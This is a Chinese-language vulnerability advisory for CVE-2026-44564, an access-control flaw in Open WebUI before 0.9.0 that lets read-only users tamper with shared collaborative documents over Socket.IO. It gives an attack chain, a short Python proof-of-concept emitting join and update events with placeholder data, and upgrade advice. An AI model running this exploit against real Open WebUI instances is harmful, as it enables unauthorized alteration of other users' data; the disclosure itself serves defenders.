CVE-2026-44564 CVSS 5.4 中危

CVE-2026-44564 Open WebUI权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44564

漏洞类型

访问控制失效

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI在0.9.0之前版本存在权限绕过漏洞。攻击者利用Socket.IO事件处理逻辑缺陷，在仅拥有只读权限的情况下，通过加入文档房间并发送更新事件，即可修改内存中的Yjs文档状态，并将更改广播至所有协作者，导致未授权的数据篡改。

技术细节

该漏洞的核心在于Open WebUI对Socket.IO事件`ydoc:document:update`的权限校验机制存在缺陷。系统在处理文档更新请求时，仅验证了发送者是否属于该文档的Socket.IO房间成员，但未进一步验证发送者是否具备文档的写权限。攻击者首先利用合法的只读账户，通过`ydoc:document:join`事件（仅需读权限即可触发）成功加入目标文档的房间。一旦加入房间，攻击者即可利用逻辑漏洞，直接向服务器发送`ydoc:document:update`事件。服务器接收后，会直接修改内存中的Yjs文档对象状态，并将修改结果实时广播给房间内的所有其他协作者，从而实现了从只读权限到写权限的越权操作。

攻击链分析

STEP 1

信息收集

攻击者识别出目标运行的是Open WebUI 0.9.0之前的版本，并获取了一个具有只读权限的合法账户。

STEP 2

建立连接

攻击者利用该账户通过Socket.IO连接到服务器，并发送`ydoc:document:join`事件加入目标文档的房间。

STEP 3

权限绕过

由于服务器未在`ydoc:document:update`处理程序中校验写权限，攻击者利用房间成员身份，向服务器发送恶意的文档更新事件。

STEP 4

数据篡改

服务器接受更新请求，修改内存中的Yjs文档状态，并将篡改后的内容广播给所有协作者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socketio

# Create a Socket.IO client
sio = socketio.Client()

@sio.event
def connect():
    print('Connection established')

# Target URL of the vulnerable Open WebUI instance
target_url = 'http://vulnerable-target:port'

try:
    # Connect to the server
    sio.connect(target_url)

    # Step 1: Join the document room using read-only permissions
    # The 'ydoc:document:join' handler checks for read permission
    document_id = 'example_doc_id'
    print(f"Joining room for document: {document_id}")
    sio.emit('ydoc:document:join', {'doc_id': document_id})

    # Step 2: Send update events without write permission
    # The 'ydoc:document:update' handler checks room membership but NOT write permission
    print("Sending malicious update...")
    malicious_payload = {
        'doc_id': document_id,
        'update': b'\x00\x01\x02...' # Binary Yjs update data
    }
    sio.emit('ydoc:document:update', malicious_payload)

    print("Exploit completed. Check document state.")

except Exception as e:
    print(f"An error occurred: {e}")
finally:
    sio.disconnect()

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

建议立即将Open WebUI升级到0.9.0或更高版本以修复此漏洞。如果无法立即升级，应限制对Socket.IO端点的网络访问，仅允许可信的内网用户连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表